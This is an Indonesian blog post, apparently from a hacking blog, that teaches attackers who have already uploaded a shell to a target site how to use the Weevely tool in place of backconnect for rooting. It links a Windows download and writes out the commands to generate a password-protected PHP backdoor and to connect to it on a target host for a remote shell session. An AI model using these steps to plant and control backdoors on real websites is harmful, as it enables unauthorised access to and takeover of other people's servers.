Weevely ( alternatif BackConnect )
Selama ini seorang attacker setelah mendapat target dan berhasil upload
shell selalu melakukan backconnect untuk melakukan rooting target,tapi
setahu saya ( yg saya tahu lho ya ) untuk melakukan backconnect harus mempunyai IP PUBLIC,lha yg pake koneksi modem kaya saya jelas gak bisa ( atau tepatnya belum tahu caranya
),tapi kini ada alternatif lain yaitu menggunakan Weevely.Pada BT tools
ini sudah tersedia,kalau versi windows bisa download di:
http://www.mediafire.com/?bdye3fa98gg72sz
install dulu python dan pyreadline-2.0.win32 bagi yg pake windows
Pertama-tama kita ciptakan backdoor menggunakan weevely,pada kasus ini saya beri passsword j0ck3r jadi perintahnya:
./weevely.py generate j0ck3r
versi windows
main.py -g -o nama_backdoor.php password
./weevely.py www.target.com/path/weevely.php j0ck3r
versi windows
main.py -t -u www.target.com/path/nama_backdoor.php -p password
nha jadilah sesi backconnect
Thank's to: Flazer K|C|H atas tutor weevely in windows
Diposting oleh j0ck3r di 11.26
0 komentar:
Posting Komentar